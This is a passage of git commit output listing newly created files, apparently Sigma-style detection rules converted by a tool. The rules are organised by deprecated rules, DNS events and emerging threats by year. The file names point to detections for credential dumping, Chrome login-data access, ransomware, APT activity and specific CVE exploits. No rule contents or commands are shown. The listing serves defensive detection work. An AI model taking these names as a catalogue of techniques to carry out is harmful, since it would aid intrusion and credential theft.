tools/sigmac/converted_rules/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_azurehound_commands.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_invocation_lolscript.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_file_and_directory_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_invoke_nightmare.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_ps_susp_gwmi.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_generic.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_specific.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_dragonfly.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_gallium.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml 
create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_read_contents.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cscript_vbs.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_cmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_findstr.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_office.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mal_ryuk.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml create mode 100644 
tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_msdt_diagcab.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_new_service_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_service_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_reg_dump_sam.yml create mode 100644 
tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_renamed_paexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_root_certificate_installed.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_run_from_zip.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_service_stop.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_run_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_whoami_as_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_winword_dll_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml create mode 100644 
tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_command.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wuauclt_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_event_asep_reg_keys_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_set_add_hidden_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_set_office_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_set_silentprocessexit.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/sysmon_rclone_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_defender_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_dsquery_domain_trust_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_lateral_movement_condrv.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_security_event_log_cleared.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_security_group_modification_logging.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml create mode 100644 
tools/sigmac/converted_rules/builtin/deprecated/win_susp_esentutl_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml create mode 100644 tools/sigmac/converted_rules/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_anonymfiles_com.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_mega_nz.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_tor_onion.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_ufile_io.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/driverframeworks/win_usb_device_plugged.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml create mode 100644 
tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml create mode 100644 
tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml create mode 100644 
tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/win_security_apt_wocao.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml 
create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml create mode 100644 
tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml create mode 100644 
tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml create mode 100644 
tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/win_system_malware_goofy_guineapig_service_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml create mode 100644 
tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml create mode 100644 
tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml create mode 100644 
tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml create mode 100644 
